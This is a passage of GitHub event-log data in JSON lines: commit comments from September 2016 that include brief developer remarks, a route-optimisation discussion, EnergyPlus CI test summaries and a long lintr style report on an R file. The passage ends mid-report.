{"id":"4595191937","type":"CommitCommentEvent","actor":{"login":"rennyallen"},"repo":{"name":"rennyallen/renny.ren"},"payload":{"comment":{"id":19111054,"position":null,"line":null,"path":null,"commit_id":"c7b3f88a4abf242caa95a3439fffb9a8fedc2d08","created_at":"2016-09-21T09:50:49Z","updated_at":"2016-09-21T09:50:49Z","body":"achieved basic CRUD"}},"created_at":"2016-09-21T09:50:49Z"}
{"id":"4595195290","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"stefanesser/suhosin"},"payload":{"comment":{"id":19111066,"position":null,"line":null,"path":null,"commit_id":"11c4ca8e14c6b0a94e95f8c70daa3e3c47a15d26","created_at":"2016-09-21T09:51:30Z","updated_at":"2016-09-21T09:51:30Z","body":"Closes #105 "}},"created_at":"2016-09-21T09:51:30Z"}
{"id":"4595200022","type":"CommitCommentEvent","actor":{"login":"mickata"},"repo":{"name":"mickata/PRACTICE-ONLY"},"payload":{"comment":{"id":19111073,"position":null,"line":null,"path":null,"commit_id":"13e4a1076234b86aeec641c14eed090ba25a8ab9","created_at":"2016-09-21T09:52:28Z","updated_at":"2016-09-21T09:52:28Z","body":"Fuck sake"}},"created_at":"2016-09-21T09:52:28Z"}
{"id":"4595206435","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19111083,"position":null,"line":null,"path":null,"commit_id":"2558e46f250ffa7a9c090b6e35368c8b23e388ff","created_at":"2016-09-21T09:53:41Z","updated_at":"2016-09-21T09:53:41Z","body":"member.score.to_s(:delimited)\r\nの部分は\r\nnumber_with_delimiter(member.score)\r\nでもOK"}},"created_at":"2016-09-21T09:53:41Z"}
{"id":"4595208182","type":"CommitCommentEvent","actor":{"login":"PGWelch"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19111085,"position":null,"line":null,"path":null,"commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-21T09:54:04Z","updated_at":"2016-09-21T09:54:04Z","body":"+ Regarding how to solve this, you'd need the hard activity constraint to be able to create a state when it evaluates the shipment pickup position, which can be saved in the insertiondata or similar and used when the hard activity constraint evaluates the shipment delivery location. This state should contain the new slack times for all deliveries after the pickup insertion point.\r\n\r\nLuckily enough the algorithmic complexity is actually the same as the shipment insertion right now - for each shipment pickup insertion location you currently evaluate all later shipment delivery insertion locations. So for a route of size n you have O(n2) operations. \r\n\r\nTo fix this, for each shipment pickup insertion location you need to recalculate the slack times for all later shipment deliveries - so this is still O(n2). Obviously you have more calculations but as the algorithmic complexity is the same as current, we should still be able to scale to larger problems."}},"created_at":"2016-09-21T09:54:04Z"}
{"id":"4595212748","type":"CommitCommentEvent","actor":{"login":"cathay4t"},"repo":{"name":"cathay4t/libstoragemgmt"},"payload":{"comment":{"id":19111088,"position":null,"line":null,"path":null,"commit_id":"b0942e266e1b86ef5e50746f7f14f210f0f14dce","created_at":"2016-09-21T09:54:58Z","updated_at":"2016-09-21T09:54:58Z","body":"https://bugzilla.redhat.com/show_bug.cgi?id=1375892"}},"created_at":"2016-09-21T09:54:58Z"}
{"id":"4595213470","type":"CommitCommentEvent","actor":{"login":"garydux"},"repo":{"name":"codehaus-cargo/cargo"},"payload":{"comment":{"id":19111090,"position":null,"line":null,"path":null,"commit_id":"2c37b11a05ff83b8530e17efe854af6956175589","created_at":"2016-09-21T09:55:06Z","updated_at":"2016-09-21T09:55:06Z","body":"@alitokmen Thank you. Wanted to make a PR but you was faster."}},"created_at":"2016-09-21T09:55:06Z"}
{"id":"4595216652","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111095,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-21T09:55:42Z","updated_at":"2016-09-21T09:55:42Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2371 of 2373 tests passed, 0 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T09:55:42Z"}
{"id":"4595217513","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":19111098,"position":null,"line":null,"path":null,"commit_id":"a974755d375009332f4f481c4c143c5b73fa3b73","created_at":"2016-09-21T09:55:52Z","updated_at":"2016-09-21T09:55:52Z","body":"@chelmuth: please add to staging"}},"created_at":"2016-09-21T09:55:52Z"}
{"id":"4595221419","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19111103,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-21T09:56:36Z","updated_at":"2016-09-21T09:56:36Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T09:56:36Z"}
{"id":"4595222240","type":"CommitCommentEvent","actor":{"login":"FredrIQ"},"repo":{"name":"roukaour/pokecrystal"},"payload":{"comment":{"id":19111107,"position":null,"line":null,"path":null,"commit_id":"f8254a0d33785139c5a7688e6adf0c0ef50871c5","created_at":"2016-09-21T09:56:46Z","updated_at":"2016-09-21T09:56:46Z","body":"heh, I was actually considering suggesting a bit array for the TMs/HMs to avoid it taking up as much space as it does, and to allow extending it further if desired"}},"created_at":"2016-09-21T09:56:46Z"}
{"id":"4595222514","type":"CommitCommentEvent","actor":{"login":"yma88"},"repo":{"name":"yma88/indy"},"payload":{"comment":{"id":19111109,"position":null,"line":null,"path":null,"commit_id":"9a3883d057bd127f2477c95f4e648ebadda148b5","created_at":"2016-09-21T09:56:49Z","updated_at":"2016-09-21T09:56:49Z","body":"@jdcasey\r\nI use expression property ${repo.one.url} to do the test for impied repos, but the test has passed, I am not sure whether the wrong place I've reproduced for this issue [#359](https://github.com/Commonjava/indy/issues/359)  right?"}},"created_at":"2016-09-21T09:56:49Z"}
{"id":"4595227082","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/documentation-user"},"payload":{"comment":{"id":19111118,"position":4,"line":11,"path":"applications.rst","commit_id":"90eb978cfbe1ce11d48320d12e2fd953b81bb774","created_at":"2016-09-21T09:57:39Z","updated_at":"2016-09-21T09:57:39Z","body":"@fgi-odoo FYI: You have to update .tx/config to activate the translation for this new section. "}},"created_at":"2016-09-21T09:57:39Z"}
{"id":"4595227212","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19111119,"position":null,"line":null,"path":null,"commit_id":"66759c0898da3ce78a587caa17ddd1e47ea8560e","created_at":"2016-09-21T09:57:39Z","updated_at":"2016-09-21T09:57:39Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L79) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:82:6:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:83:7:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L88) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:13:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:17:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:21:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:26:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:16:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L114) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:7:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:118:10:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:23:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:118:29:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:139:5:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L140) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L140) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:12:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:30:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L152) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:166:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L166) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:170:40:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                       ^\n```\n[R/ABC_SMC.R:170:53:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                   ~^~\n```\n[R/ABC_SMC.R:170:59:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                          ^\n```\n[R/ABC_SMC.R:170:68:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                                  ~^~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:174:8:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L174) *style:* **Commented code should be removed.**\n```r\n​     # source(\"/Users/janzen/GitHub/STEPCAM/R/modified_dbFD.R\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L175) *style:* **lines should not be more than 80 characters.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L175) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:82:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                                                                                 ^\n```\n[R/ABC_SMC.R:176:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:177:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L177) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:14:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L193) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L195) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:198:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L199) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:17:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                